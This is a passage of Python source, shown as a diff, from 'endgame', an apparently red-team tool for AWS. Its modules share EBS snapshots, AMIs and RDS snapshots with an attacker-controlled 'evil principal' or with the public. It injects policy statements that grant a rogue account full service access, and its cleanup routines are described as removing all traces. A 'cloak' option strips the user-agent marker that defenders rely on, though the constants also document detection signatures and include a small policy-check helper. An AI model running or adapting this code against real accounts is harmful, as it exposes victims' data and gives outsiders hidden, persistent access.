shared_with_accounts: list,
success: bool,
resource_type: str,
resource_name: str,
service: str,
updated_policy: list, # we can format this however we want even though there are no RBPs
original_policy: list, # we can format this however we want even though there are no RBPs
evil_principal: str,
victim_resource_arn: str
):
self.shared_with_accounts = shared_with_accounts
self.success = success
self.evil_principal = evil_principal
self.victim_resource_arn = victim_resource_arn
self.resource_type = resource_type
self.resource_name = resource_name
self.service = service
self.original_policy = original_policy
self.updated_policy = updated_policy
# This is kind of silly because this is just a list of account IDs, but I am going to piggyback off of the previous
# structure out of convenience
# TODO: Figure out a better way to do this. Mostly because I am doing the RDS and EBS sharing last minute
@property
def updated_policy_sids(self) -> list:
return self.updated_policy
@property
def original_policy_sids(self) -> list:
return self.original_policy
@property
def added_sids(self) -> list:
diff = []
if len(self.updated_policy_sids) > len(self.original_policy_sids):
diff = list(set(self.updated_policy_sids) - set(self.original_policy_sids))
return diff
@property
def removed_sids(self) -> list:
diff = []
if len(self.original_policy_sids) > len(self.updated_policy_sids):
diff = list(set(self.original_policy_sids) - set(self.updated_policy_sids))
return diff
class ResourceSharingApi(object):
__meta_class__ = ABCMeta
def __init__(
self,
name: str,
resource_type: str,
service: str,
region: str,
client: boto3.Session.client,
current_account_id: str,
):
self.name = name
self.resource_type = resource_type
self.client = client
self.current_account_id = current_account_id
self.service = service
self.region = region
self.shared_with_accounts = self._get_shared_with_accounts().shared_with_accounts
self.original_shared_with_accounts = copy.deepcopy(self.shared_with_accounts)
@property
@abstractmethod
def arn(self) -> str:
raise NotImplementedError("Must override arn")
@abstractmethod
def _get_shared_with_accounts(self) -> ResponseGetSharingApi:
raise NotImplementedError("Must override _get_shared_with_accounts")
@abstractmethod
def share(self, accounts_to_add: list, accounts_to_remove: list) -> ResponseGetSharingApi:
raise NotImplementedError("Must override share")
@abstractmethod
def add_myself(self, evil_policy: dict) -> ResponseGetSharingApi:
raise NotImplementedError("Must override add_myself")
@abstractmethod
def undo(self, evil_principal: str, dry_run: bool = False) -> ResponseGetSharingApi:
raise NotImplementedError("Must override undo")

View File

@ -0,0 +1,200 @@
import logging
import boto3
import botocore
from abc import ABC
from botocore.exceptions import ClientError
from policy_sentry.util.arns import get_resource_path_from_arn, get_account_from_arn
from endgame.exposure_via_resource_policies.common import ResourceTypes
from endgame.exposure_via_sharing_apis.common import ResourceSharingApi, ResponseGetSharingApi
from endgame.shared.list_resources_response import ListResourcesResponse
logger = logging.getLogger(__name__)
class EbsSnapshot(ResourceSharingApi, ABC):
def __init__(self, name: str, region: str, client: boto3.Session.client, current_account_id: str):
self.service = "ebs"
self.resource_type = "snapshot"
self.region = region
self.current_account_id = current_account_id
self.name = name
super().__init__(name, self.resource_type, self.service, region, client, current_account_id)
@property
def arn(self) -> str:
return f"arn:aws:ec2:{self.region}:{self.current_account_id}:{self.resource_type}/{self.name}"
def _get_shared_with_accounts(self) -> ResponseGetSharingApi:
logger.debug("Getting snapshot status policy for %s" % self.arn)
shared_with_accounts = []
try:
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/ec2.html#EC2.Client.describe_snapshot_attribute
response = self.client.describe_snapshot_attribute(
Attribute="createVolumePermission",
SnapshotId=self.name,
)
attributes = response.get("CreateVolumePermissions")
for attribute in attributes:
if attribute.get("Group"):
if attribute.get("Group") == "all":
shared_with_accounts.append("all")
if attribute.get("UserId"):
shared_with_accounts.append(attribute.get("UserId"))
success = True
except botocore.exceptions.ClientError as error:
logger.debug(error)
success = False
response_message = ResponseGetSharingApi(shared_with_accounts=shared_with_accounts, success=success,
evil_principal="", victim_resource_arn=self.arn,
resource_name=self.name, resource_type=self.resource_type,
service=self.service,
original_policy=shared_with_accounts,
updated_policy=[]
)
return response_message
def share(self, accounts_to_add: list, accounts_to_remove: list) -> ResponseGetSharingApi:
shared_with_accounts = []
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/ec2.html#EC2.Client.modify_snapshot_attribute
try:
if accounts_to_add:
logger.debug(f"Sharing the snapshot {self.name} with the accounts {', '.join(accounts_to_add)}")
if "all" in accounts_to_add:
self.client.modify_snapshot_attribute(
Attribute="createVolumePermission",
SnapshotId=self.name,
GroupNames=["all"],
OperationType="add",
)
else:
self.client.modify_snapshot_attribute(
Attribute="createVolumePermission",
SnapshotId=self.name,
UserIds=accounts_to_add,
OperationType="add",
)
if accounts_to_remove:
logger.debug(f"Removing access to the snapshot {self.name} from the accounts {', '.join(accounts_to_add)}")
if "all" in accounts_to_remove:
self.client.modify_snapshot_attribute(
Attribute="createVolumePermission",
SnapshotId=self.name,
GroupNames=["all"],
OperationType="remove",
)
else:
self.client.modify_snapshot_attribute(
Attribute="createVolumePermission",
SnapshotId=self.name,
UserIds=accounts_to_remove,
OperationType="remove",
)
shared_with_accounts = self._get_shared_with_accounts().shared_with_accounts
success = True
except botocore.exceptions.ClientError:
success = False
response_message = ResponseGetSharingApi(shared_with_accounts=shared_with_accounts, success=success,
evil_principal="", victim_resource_arn=self.arn,
resource_name=self.name, resource_type=self.resource_type,
service=self.service,
original_policy=self.original_shared_with_accounts,
updated_policy=self.original_shared_with_accounts
)
return response_message
def add_myself(self, evil_principal: str, dry_run: bool = False) -> ResponseGetSharingApi:
"""Add your rogue principal to the AWS resource"""
evil_account_id = self.parse_evil_principal(evil_principal=evil_principal)
logger.debug(f"Sharing {self.arn} with {evil_account_id}")
shared_with_accounts = []
if not dry_run:
accounts_to_add = [evil_account_id]
share_response = self.share(accounts_to_add=accounts_to_add, accounts_to_remove=[])
shared_with_accounts = share_response.shared_with_accounts
success = share_response.success
else:
try:
# this is just to get the success message
tmp = self._get_shared_with_accounts()
success = tmp.success
shared_with_accounts = tmp.shared_with_accounts
shared_with_accounts.append(evil_account_id)
except botocore.exceptions.ClientError as error:
logger.debug(error)
success = False
response_message = ResponseGetSharingApi(shared_with_accounts=shared_with_accounts, success=success,
evil_principal=evil_principal, victim_resource_arn=self.arn,
resource_name=self.name, resource_type=self.resource_type,
service=self.service,
original_policy=self.original_shared_with_accounts,
updated_policy=shared_with_accounts
)
return response_message
def undo(self, evil_principal: str, dry_run: bool = False) -> ResponseGetSharingApi:
"""Remove all traces"""
evil_account_id = self.parse_evil_principal(evil_principal=evil_principal)
logger.debug(f"Removing {evil_account_id} access to {self.arn}")
shared_with_accounts = []
if not dry_run:
accounts_to_remove = [evil_account_id]
share_response = self.share(accounts_to_add=[], accounts_to_remove=accounts_to_remove)
shared_with_accounts = share_response.shared_with_accounts
success = share_response.success
else:
shared_with_accounts = self.shared_with_accounts
if evil_account_id in shared_with_accounts:
shared_with_accounts.remove(evil_account_id)
success = True
response_message = ResponseGetSharingApi(shared_with_accounts=shared_with_accounts, success=success,
evil_principal=evil_principal, victim_resource_arn=self.arn,
resource_name=self.name, resource_type=self.resource_type,
service=self.service,
original_policy=self.original_shared_with_accounts,
updated_policy=shared_with_accounts
)
return response_message
def parse_evil_principal(self, evil_principal: str) -> str:
if ":" in evil_principal:
evil_account_id = get_account_from_arn(evil_principal)
# RDS requires publicly shared snapshots to be supplied via the value "all"
elif evil_principal == "*":
evil_account_id = "all"
# Otherwise, the evil_principal is an account ID
else:
evil_account_id = evil_principal
return evil_account_id
class EbsSnapshots(ResourceTypes):
def __init__(self, client: boto3.Session.client, current_account_id: str, region: str):
super().__init__(client, current_account_id, region)
self.service = "ebs"
self.resource_type = "snapshot"
@property
def resources(self) -> [ListResourcesResponse]:
"""Get a list of these resources"""
resources = []
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/ec2.html#EC2.Paginator.DescribeSnapshots
paginator = self.client.get_paginator("describe_snapshots")
# Apply a filter, otherwise we get public EBS snapshots too, from randos on the internet.
page_iterator = paginator.paginate(Filters=[
{
"Name": "owner-id",
"Values": [self.current_account_id]
}
])
for page in page_iterator:
these_resources = page["Snapshots"]
for resource in these_resources:
snapshot_id = resource.get("SnapshotId")
kms_key_id = resource.get("KmsKeyId")
volume_id = resource.get("VolumeId")
arn = f"arn:aws:ec2:{self.region}:{self.current_account_id}:snapshot/{snapshot_id}"
list_resources_response = ListResourcesResponse(
service=self.service, account_id=self.current_account_id, arn=arn, region=self.region,
resource_type=self.resource_type, name=snapshot_id)
resources.append(list_resources_response)
return resources

View File

@ -0,0 +1,189 @@
import logging
import boto3
import botocore
from abc import ABC
from botocore.exceptions import ClientError
from policy_sentry.util.arns import get_resource_path_from_arn, get_account_from_arn
from endgame.exposure_via_resource_policies.common import ResourceTypes
from endgame.exposure_via_sharing_apis.common import ResourceSharingApi, ResponseGetSharingApi
from endgame.shared.list_resources_response import ListResourcesResponse
logger = logging.getLogger(__name__)
class Ec2Image(ResourceSharingApi, ABC):
def __init__(self, name: str, region: str, client: boto3.Session.client, current_account_id: str):
self.service = "ec2-ami"
self.resource_type = "image"
self.region = region
self.current_account_id = current_account_id
self.name = name
super().__init__(name, self.resource_type, self.service, region, client, current_account_id)
@property
def arn(self) -> str:
return f"arn:aws:ec2:{self.region}:{self.current_account_id}:{self.resource_type}/{self.name}"
def _get_shared_with_accounts(self) -> ResponseGetSharingApi:
logger.debug("Getting snapshot status policy for %s" % self.arn)
shared_with_accounts = []
try:
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/ec2.html#EC2.Client.describe_image_attribute
response = self.client.describe_image_attribute(
ImageId=self.name,
Attribute="launchPermission"
)
if response.get("LaunchPermissions"):
for launch_permission in response.get("LaunchPermissions"):
if launch_permission.get("Group"):
if launch_permission.get("Group") == "all":
shared_with_accounts.append("all")
if launch_permission.get("UserId"):
shared_with_accounts.append(launch_permission.get("UserId"))
success = True
except botocore.exceptions.ClientError as error:
logger.debug(error)
success = False
response_message = ResponseGetSharingApi(shared_with_accounts=shared_with_accounts, success=success,
evil_principal="", victim_resource_arn=self.arn,
resource_name=self.name, resource_type=self.resource_type,
service=self.service,
original_policy=shared_with_accounts,
updated_policy=[]
)
return response_message
def share(self, accounts_to_add: list, accounts_to_remove: list) -> ResponseGetSharingApi:
shared_with_accounts = []
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/ec2.html#EC2.Client.modify_image_attribute
try:
if accounts_to_add:
logger.debug(f"Sharing the AMI {self.name} with the accounts {', '.join(accounts_to_add)}")
if "all" in accounts_to_add:
self.client.modify_image_attribute(
ImageId=self.name,
LaunchPermission={"Add": [{"Group": "all"}]},
)
else:
user_ids = []
for account in accounts_to_add:
user_ids.append({"UserId": account})
self.client.modify_image_attribute(
ImageId=self.name,
LaunchPermission={"Add": user_ids},
)
if accounts_to_remove:
logger.debug(f"Removing access to the AMI {self.name} from the accounts {', '.join(accounts_to_add)}")
if "all" in accounts_to_remove:
self.client.modify_image_attribute(
ImageId=self.name,
LaunchPermission={"Remove": [{"Group": "all"}]},
)
else:
user_ids = []
for account in accounts_to_remove:
user_ids.append({"UserId": account})
self.client.modify_image_attribute(
ImageId=self.name,
LaunchPermission={"Remove": user_ids},
)
shared_with_accounts = self._get_shared_with_accounts().shared_with_accounts
success = True
except botocore.exceptions.ClientError:
success = False
response_message = ResponseGetSharingApi(shared_with_accounts=shared_with_accounts, success=success,
evil_principal="", victim_resource_arn=self.arn,
resource_name=self.name, resource_type=self.resource_type,
service=self.service,
original_policy=self.original_shared_with_accounts,
updated_policy=self.original_shared_with_accounts
)
return response_message
def add_myself(self, evil_principal: str, dry_run: bool = False) -> ResponseGetSharingApi:
"""Add your rogue principal to the AWS resource"""
evil_account_id = self.parse_evil_principal(evil_principal=evil_principal)
logger.debug(f"Sharing {self.arn} with {evil_account_id}")
shared_with_accounts = []
if not dry_run:
accounts_to_add = [evil_account_id]
share_response = self.share(accounts_to_add=accounts_to_add, accounts_to_remove=[])
shared_with_accounts = share_response.shared_with_accounts
success = share_response.success
else:
try:
# this is just to get the success message
tmp = self._get_shared_with_accounts()
success = tmp.success
shared_with_accounts = tmp.shared_with_accounts
shared_with_accounts.append(evil_account_id)
except botocore.exceptions.ClientError as error:
logger.debug(error)
success = False
response_message = ResponseGetSharingApi(shared_with_accounts=shared_with_accounts, success=success,
evil_principal=evil_principal, victim_resource_arn=self.arn,
resource_name=self.name, resource_type=self.resource_type,
service=self.service,
original_policy=self.original_shared_with_accounts,
updated_policy=shared_with_accounts
)
return response_message
def undo(self, evil_principal: str, dry_run: bool = False) -> ResponseGetSharingApi:
"""Remove all traces"""
evil_account_id = self.parse_evil_principal(evil_principal=evil_principal)
logger.debug(f"Removing {evil_account_id} access to {self.arn}")
shared_with_accounts = []
if not dry_run:
accounts_to_remove = [evil_account_id]
share_response = self.share(accounts_to_add=[], accounts_to_remove=accounts_to_remove)
shared_with_accounts = share_response.shared_with_accounts
success = share_response.success
else:
shared_with_accounts = self.shared_with_accounts
if evil_account_id in shared_with_accounts:
shared_with_accounts.remove(evil_account_id)
success = True
response_message = ResponseGetSharingApi(shared_with_accounts=shared_with_accounts, success=success,
evil_principal=evil_principal, victim_resource_arn=self.arn,
resource_name=self.name, resource_type=self.resource_type,
service=self.service,
original_policy=self.original_shared_with_accounts,
updated_policy=shared_with_accounts
)
return response_message
def parse_evil_principal(self, evil_principal: str) -> str:
if ":" in evil_principal:
evil_account_id = get_account_from_arn(evil_principal)
# RDS requires publicly shared snapshots to be supplied via the value "all"
elif evil_principal == "*":
evil_account_id = "all"
# Otherwise, the evil_principal is an account ID
else:
evil_account_id = evil_principal
return evil_account_id
class Ec2Images(ResourceTypes):
def __init__(self, client: boto3.Session.client, current_account_id: str, region: str):
super().__init__(client, current_account_id, region)
self.service = "ec2-ami"
self.resource_type = "image"
@property
def resources(self) -> [ListResourcesResponse]:
"""Get a list of these resources"""
resources = []
response = self.client.describe_images(Owners=[self.current_account_id])
these_resources = response["Images"]
for resource in these_resources:
image_id = resource.get("ImageId")
name = resource.get("Name")
volume_id = resource.get("VolumeId")
arn = f"arn:aws:ec2:{self.region}:{self.current_account_id}:{self.resource_type}/{image_id}"
list_resources_response = ListResourcesResponse(
service=self.service, account_id=self.current_account_id, arn=arn, region=self.region,
resource_type=self.resource_type, name=image_id)
resources.append(list_resources_response)
return resources

View File

@ -0,0 +1,170 @@
import logging
import boto3
import botocore
from abc import ABC
from botocore.exceptions import ClientError
from policy_sentry.util.arns import get_resource_path_from_arn, get_account_from_arn
from endgame.exposure_via_resource_policies.common import ResourceTypes
from endgame.exposure_via_sharing_apis.common import ResourceSharingApi, ResponseGetSharingApi
from endgame.shared.list_resources_response import ListResourcesResponse
logger = logging.getLogger(__name__)
class RdsSnapshot(ResourceSharingApi, ABC):
def __init__(self, name: str, region: str, client: boto3.Session.client, current_account_id: str):
self.service = "rds"
self.resource_type = "snapshot"
self.region = region
self.current_account_id = current_account_id
self.name = name
super().__init__(name, self.resource_type, self.service, region, client, current_account_id)
@property
def arn(self) -> str:
return f"arn:aws:{self.service}:{self.region}:{self.current_account_id}:{self.resource_type}/{self.name}"
def _get_shared_with_accounts(self) -> ResponseGetSharingApi:
logger.debug("Getting snapshot status policy for %s" % self.arn)
shared_with_accounts = []
try:
response = self.client.describe_db_snapshot_attributes(
DBSnapshotIdentifier=self.name
)
attributes = response.get("DBSnapshotAttributesResult").get("DBSnapshotAttributes")
for attribute in attributes:
if attribute.get("AttributeName") == "restore":
shared_with_accounts.extend(attribute.get("AttributeValues"))
break
success = True
except botocore.exceptions.ClientError:
success = False
response_message = ResponseGetSharingApi(shared_with_accounts=shared_with_accounts, success=success,
evil_principal="", victim_resource_arn=self.arn,
resource_name=self.name, resource_type=self.resource_type,
service=self.service,
original_policy=shared_with_accounts,
updated_policy=[]
)
return response_message
def share(self, accounts_to_add: list, accounts_to_remove: list) -> ResponseGetSharingApi:
shared_with_accounts = []
if accounts_to_add:
logger.debug(f"Sharing the snapshot {self.name} with the accounts {', '.join(accounts_to_add)}")
if accounts_to_remove:
logger.debug(f"Removing access to snapshot {self.name} for the accounts {', '.join(accounts_to_add)}")
try:
snapshot_attributes_response = self.client.modify_db_snapshot_attribute(
DBSnapshotIdentifier=self.name,
AttributeName='restore',
ValuesToAdd=accounts_to_add,
ValuesToRemove=accounts_to_remove
)
attributes = snapshot_attributes_response.get("DBSnapshotAttributesResult").get("DBSnapshotAttributes")
for attribute in attributes:
if attribute.get("AttributeName") == "restore":
shared_with_accounts.extend(attribute.get("AttributeValues"))
break
success = True
except botocore.exceptions.ClientError:
success = False
response_message = ResponseGetSharingApi(shared_with_accounts=shared_with_accounts, success=success,
evil_principal="", victim_resource_arn=self.arn,
resource_name=self.name, resource_type=self.resource_type,
service=self.service,
original_policy=self.original_shared_with_accounts,
updated_policy=self.original_shared_with_accounts
)
return response_message
def add_myself(self, evil_principal: str, dry_run: bool = False) -> ResponseGetSharingApi:
"""Add your rogue principal to the AWS resource"""
evil_account_id = self.parse_evil_principal(evil_principal=evil_principal)
logger.debug(f"Sharing {self.arn} with {evil_account_id}")
shared_with_accounts = []
if not dry_run:
accounts_to_add = [evil_account_id]
share_response = self.share(accounts_to_add=accounts_to_add, accounts_to_remove=[])
shared_with_accounts = share_response.shared_with_accounts
success = share_response.success
else:
try:
# this is just to get the success message
tmp = self._get_shared_with_accounts()
success = tmp.success
shared_with_accounts = tmp.shared_with_accounts
shared_with_accounts.append(evil_account_id)
except botocore.exceptions.ClientError as error:
logger.debug(error)
success = False
response_message = ResponseGetSharingApi(shared_with_accounts=shared_with_accounts, success=success,
evil_principal=evil_principal, victim_resource_arn=self.arn,
resource_name=self.name, resource_type=self.resource_type,
service=self.service,
original_policy=self.original_shared_with_accounts,
updated_policy=shared_with_accounts
)
return response_message
def undo(self, evil_principal: str, dry_run: bool = False) -> ResponseGetSharingApi:
"""Remove all traces"""
evil_account_id = self.parse_evil_principal(evil_principal=evil_principal)
logger.debug(f"Removing {evil_account_id} access to {self.arn}")
shared_with_accounts = []
if not dry_run:
accounts_to_remove = [evil_account_id]
share_response = self.share(accounts_to_add=[], accounts_to_remove=accounts_to_remove)
shared_with_accounts = share_response.shared_with_accounts
success = share_response.success
else:
shared_with_accounts = self.shared_with_accounts
if evil_account_id in shared_with_accounts:
shared_with_accounts.remove(evil_account_id)
success = True
response_message = ResponseGetSharingApi(shared_with_accounts=shared_with_accounts, success=success,
evil_principal=evil_principal, victim_resource_arn=self.arn,
resource_name=self.name, resource_type=self.resource_type,
service=self.service,
original_policy=self.original_shared_with_accounts,
updated_policy=shared_with_accounts
)
return response_message
def parse_evil_principal(self, evil_principal: str) -> str:
if ":" in evil_principal:
evil_account_id = get_account_from_arn(evil_principal)
# RDS requires publicly shared snapshots to be supplied via the value "all"
elif evil_principal == "*":
evil_account_id = "all"
# Otherwise, the evil_principal is an account ID
else:
evil_account_id = evil_principal
return evil_account_id
class RdsSnapshots(ResourceTypes):
def __init__(self, client: boto3.Session.client, current_account_id: str, region: str):
super().__init__(client, current_account_id, region)
self.service = "rds"
self.resource_type = "snapshot"
@property
def resources(self) -> [ListResourcesResponse]:
"""Get a list of these resources"""
resources = []
paginator = self.client.get_paginator("describe_db_snapshots")
page_iterator = paginator.paginate()
for page in page_iterator:
these_resources = page["DBSnapshots"]
for resource in these_resources:
snapshot_identifier = resource.get("DBSnapshotIdentifier")
instance_identifier = resource.get("DBInstanceIdentifier")
arn = resource.get("DBSnapshotArn")
snapshot_name = get_resource_path_from_arn(arn)
# arn:${Partition}:rds:${Region}:${Account}:snapshot:${SnapshotName}
list_resources_response = ListResourcesResponse(
service=self.service, account_id=self.current_account_id, arn=arn, region=self.region,
resource_type=self.resource_type, name=snapshot_name)
resources.append(list_resources_response)
return resources

View File

View File

@ -0,0 +1,39 @@
import os
import logging
import boto3
from botocore.config import Config
from endgame.shared import constants
logger = logging.getLogger(__name__)
def get_boto3_client(profile, service: str, region="us-east-1", cloak: bool = False) -> boto3.Session.client:
logging.getLogger('botocore').setLevel(logging.CRITICAL)
session_data = {"region_name": region}
if profile:
session_data["profile_name"] = profile
session = boto3.Session(**session_data)
if cloak:
config = Config(connect_timeout=5, retries={"max_attempts": 10})
else:
config = Config(connect_timeout=5, retries={"max_attempts": 10}, user_agent=constants.USER_AGENT_INDICATOR)
if os.environ.get('LOCALSTACK_ENDPOINT_URL'):
client = session.client(service, config=config, endpoint_url=os.environ.get('LOCALSTACK_ENDPOINT_URL'))
else:
client = session.client(service, config=config)
logger.debug(f"{client.meta.endpoint_url} in {client.meta.region_name}: boto3 client login successful")
return client
def get_current_account_id(sts_client: boto3.Session.client) -> str:
response = sts_client.get_caller_identity()
current_account_id = response.get("Account")
return current_account_id
def get_available_regions(service: str):
regions = boto3.session.Session().get_available_regions(service)
logger.debug("The service %s does not have available regions. Returning us-east-1 as default")
if not regions:
regions = ["us-east-1"]
return regions

View File

@ -0,0 +1,62 @@
import copy
SUPPORTED_AWS_SERVICES = [
"all",
"acm-pca",
"ec2-ami",
"ebs",
"ecr",
"efs",
"elasticsearch",
"glacier",
"iam",
"kms",
"lambda",
"lambda-layer",
"cloudwatch",
"rds",
"s3",
"secretsmanager",
"ses",
"sns",
"sqs",
]
EMPTY_POLICY = {"Version": "2012-10-17", "Statement": []}
EC2_ASSUME_ROLE_POLICY = {
"Version": "2012-10-17",
"Statement": [
{
"Action": "sts:AssumeRole",
"Principal": {
"Service": "ec2.amazonaws.com"
},
"Effect": "Allow",
"Sid": ""
}
]
}
LAMBDA_ASSUME_ROLE_POLICY = {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "lambda.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
}
# THIS VARIABLE IS KEY. Let's say you are doing a blue team test, and you are trying to see if your team picked up on
# any modifications that were made using this tool. You can loop through policies that have this SID value to see how
# accurate your detection mechanisms were at picking up vulnerable resource-based policies like this.
# Any IAM Policy with a statement added from this tool will include the value of this variable.
SID_SIGNATURE = "Endgame"
ALLOW_CURRENT_ACCOUNT_SID_SIGNATURE = "AllowCurrentAccount"
# This can be used by blue team to identify API calls in CloudTrail executed by this tool.
USER_AGENT_INDICATOR = "HotDogsAreSandwiches"
def get_empty_policy():
"""Return a copy of an empty policy"""
return copy.deepcopy(EMPTY_POLICY)
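# Illustrative sketch (not part of the tool itself): a defender could flag any resource-based policy
# that contains a statement whose Sid equals SID_SIGNATURE, and could search CloudTrail records for
# USER_AGENT_INDICATOR in the "userAgent" field of each event. The helper below shows the policy check.
def policy_contains_endgame_statement(policy: dict) -> bool:
    """Return True if any statement in the given policy document carries the Endgame Sid."""
    for statement in policy.get("Statement", []):
        if statement.get("Sid") == SID_SIGNATURE:
            return True
    return False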

View File

@ -0,0 +1,15 @@
"""
When we list resources under a service, instead of returning an ARN or a name, return this object that collects both
and other metadata. Gives us more flexibility.
"""
class ListResourcesResponse:
def __init__(self, service: str, arn: str, name: str, resource_type: str, account_id: str, region: str, note: str = None):
self.service = service
self.arn = arn
self.name = name
self.note = note
self.account_id = account_id
self.region = region
self.resource_type = resource_type
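# Illustrative usage (all values are placeholders): callers create one of these per resource, e.g.
#   ListResourcesResponse(service="s3", arn="arn:aws:s3:::example-bucket", name="example-bucket",
#                         resource_type="bucket", account_id="111122223333", region="us-east-1")
# and downstream code reads .arn, .name, or .note instead of passing bare strings around.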

View File

@ -0,0 +1,202 @@
import json
import copy
from endgame.shared.statement_detail import StatementDetail
from endgame.shared import constants
class PolicyDocument:
"""
Holds a policy document
"""
def __init__(
self,
policy: dict,
service: str,
override_action: str = None,
include_resource_block: bool = True,
override_resource_block: str = None,
override_account_id_instead_of_principal: bool = False
):
statement_structure = policy.get("Statement", [])
self.policy = policy
self.original_policy = copy.deepcopy(policy)
self.service = service
self.override_action = override_action
self.include_resource_block = include_resource_block
self.override_resource_block = override_resource_block
self.override_account_id_instead_of_principal = override_account_id_instead_of_principal
self.statements = self._statements(statement_structure)
def __str__(self):
return json.dumps(self.json)
def __repr__(self):
return json.dumps(self.json)
def _statements(self, statement_structure) -> [StatementDetail]:
# Statement can be a list or a string, but we prefer lists for uniformity
if not isinstance(statement_structure, list):
statement_structure = [statement_structure] # pragma: no cover
statements = []
for statement in statement_structure:
statements.append(StatementDetail(
statement=statement,
override_account_id_instead_of_principal=self.override_account_id_instead_of_principal,
override_action=self.override_action,
service=self.service
))
return statements
@property
def sids(self):
statement_ids = []
for statement in self.statements:
statement_ids.append(statement.sid)
return statement_ids
@property
def json(self):
"""Return the Policy in JSON"""
policy = {
"Version": "2012-10-17",
"Statement": []
}
for statement in self.statements:
policy["Statement"].append(json.loads(statement.__str__()))
return policy
def statement_allow_account_id(
self,
account_id: str,
resource_arn: str = "*",
sid_name: str = "AllowCurrentAccount",
principal: str = None,
) -> dict:
if self.override_action:
if "," in self.override_action:
action_block = self.override_action.split(",")
else:
action_block = self.override_action
else:
# If override action is not supplied, just give full access to the whole service 🤡
action_block = [f"{self.service}:*"]
if not principal:
principal = f"arn:aws:iam::{account_id}:root"
statement = {
"Sid": sid_name,
"Action": action_block,
"Effect": "Allow",
"Principal": {
"AWS": [
principal
# f"arn:aws:iam::{current_account_id}:root"
]
},
}
if self.include_resource_block:
statement["Resource"] = get_resource_from_override_settings(
resource_arn=resource_arn, override_resource_block=self.override_resource_block)
allow_current_account = StatementDetail(
statement=statement,
override_account_id_instead_of_principal=self.override_account_id_instead_of_principal,
override_action=self.override_action,
service=self.service
)
return json.loads(allow_current_account.__str__())
def policy_plus_evil_principal(
self,
victim_account_id: str,
evil_principal: str,
resource_arn: str = "*",
) -> dict:
policy = {
"Version": "2012-10-17",
"Statement": []
}
# Add AllowCurrentAccount to statements if there are no statements
if len(self.sids) == 0 or constants.ALLOW_CURRENT_ACCOUNT_SID_SIGNATURE not in self.sids:
allow_current_account_statement = self.statement_allow_account_id(
account_id=victim_account_id,
resource_arn=resource_arn,
)
self.statements.append(StatementDetail(
statement=allow_current_account_statement,
service=self.service,
override_action=self.override_action,
override_account_id_instead_of_principal=self.override_account_id_instead_of_principal
))
# If Endgame is not there, add it.
if constants.SID_SIGNATURE not in self.sids:
evil_statement = self.statement_allow_account_id(
account_id=victim_account_id,
principal=evil_principal,
resource_arn=resource_arn,
sid_name=constants.SID_SIGNATURE
)
self.statements.append(StatementDetail(
statement=evil_statement,
service=self.service,
override_action=self.override_action,
override_account_id_instead_of_principal=self.override_account_id_instead_of_principal
))
for statement in self.statements:
# Set resources
if self.include_resource_block:
statement.resources = get_resource_from_override_settings(
resource_arn=resource_arn, override_resource_block=self.override_resource_block)
policy["Statement"].append(json.loads(statement.__str__()))
return policy
def policy_minus_evil_principal(
self,
victim_account_id: str,
evil_principal: str,
resource_arn: str = "*",
):
policy = {
"Version": "2012-10-17",
"Statement": []
}
# Add AllowCurrentAccount to statements if there are no statements
if len(self.sids) == 0:
allow_current_account_statement = self.statement_allow_account_id(
account_id=victim_account_id,
resource_arn=resource_arn
)
self.statements.append(StatementDetail(
statement=allow_current_account_statement,
service=self.service,
override_action=self.override_action,
override_account_id_instead_of_principal=self.override_account_id_instead_of_principal
))
for statement in self.statements:
# Skip statements that include the evil principal
if statement.sid == constants.SID_SIGNATURE:
continue
# Set resources
if self.include_resource_block:
statement.resources = get_resource_from_override_settings(
resource_arn=resource_arn, override_resource_block=self.override_resource_block)
policy["Statement"].append(json.loads(statement.__str__()))
return policy
def get_resource_from_override_settings(resource_arn: str, override_resource_block: str) -> list:
if not override_resource_block:
resource_block = [resource_arn, f"{resource_arn}/*"]
else:
if "," in override_resource_block:
resource_block = override_resource_block.split(",")
else:
resource_block = override_resource_block
return resource_block
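The override expansion above is easiest to see with concrete values. A hypothetical usage sketch (not part of the module; the bucket ARN is invented):

# Hypothetical usage sketch; the bucket ARN is invented for illustration.
# No override: the resource itself plus a wildcard child path.
get_resource_from_override_settings(
    resource_arn="arn:aws:s3:::victim-bucket", override_resource_block=None
)
# -> ['arn:aws:s3:::victim-bucket', 'arn:aws:s3:::victim-bucket/*']

# Comma-separated override: split into a list of explicit resources.
get_resource_from_override_settings(
    resource_arn="arn:aws:s3:::victim-bucket",
    override_resource_block="arn:aws:s3:::victim-bucket,arn:aws:s3:::victim-bucket/private/*",
)
# -> ['arn:aws:s3:::victim-bucket', 'arn:aws:s3:::victim-bucket/private/*']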

View File

@ -0,0 +1,234 @@
import logging
import botocore
from botocore.exceptions import ClientError
from endgame.shared import utils, constants
from endgame.shared.aws_login import get_boto3_client, get_current_account_id, get_available_regions
from endgame.shared.list_resources_response import ListResourcesResponse
from endgame.exposure_via_resource_policies import glacier_vault, sqs, lambda_layer, lambda_function, kms, \
cloudwatch_logs, efs, s3, sns, iam, ecr, secrets_manager, ses, elasticsearch, acm_pca
from endgame.exposure_via_sharing_apis import rds_snapshots, ebs_snapshots, ec2_amis
logger = logging.getLogger(__name__)
class ResourceResults:
"""A list of resources across all services"""
def __init__(self, user_provided_service: str, user_provided_region: str,
current_account_id: str, excluded_names: list = None, excluded_services: list = None, profile: str = None,
cloak: bool = False):
self.user_provided_service = user_provided_service
self.user_provided_region = user_provided_region
self.profile = profile
self.current_account_id = current_account_id
self.cloak = cloak
if excluded_names:
self.excluded_names = excluded_names
else:
self.excluded_names = []
if excluded_services:
self.excluded_services = excluded_services
else:
self.excluded_services = []
self.resources = self._resources()
def _resources(self) -> [ListResourcesResponse]:
"""Get all the resources from all specified services from all specified regions"""
resources = []
if self.user_provided_service == "all":
for supported_service in constants.SUPPORTED_AWS_SERVICES:
if supported_service not in self.excluded_services:
if supported_service != "all":
logger.info("Creating a list of resources for %s" % supported_service)
service_resources = ServiceResourcesMultiRegion(user_provided_service=supported_service,
user_provided_region=self.user_provided_region,
current_account_id=self.current_account_id,
profile=self.profile,
cloak=self.cloak)
resources.extend(service_resources.resources)
else:
logger.info("Combing through resources for %s" % self.user_provided_service)
service_resources = ServiceResourcesMultiRegion(user_provided_service=self.user_provided_service,
user_provided_region=self.user_provided_region,
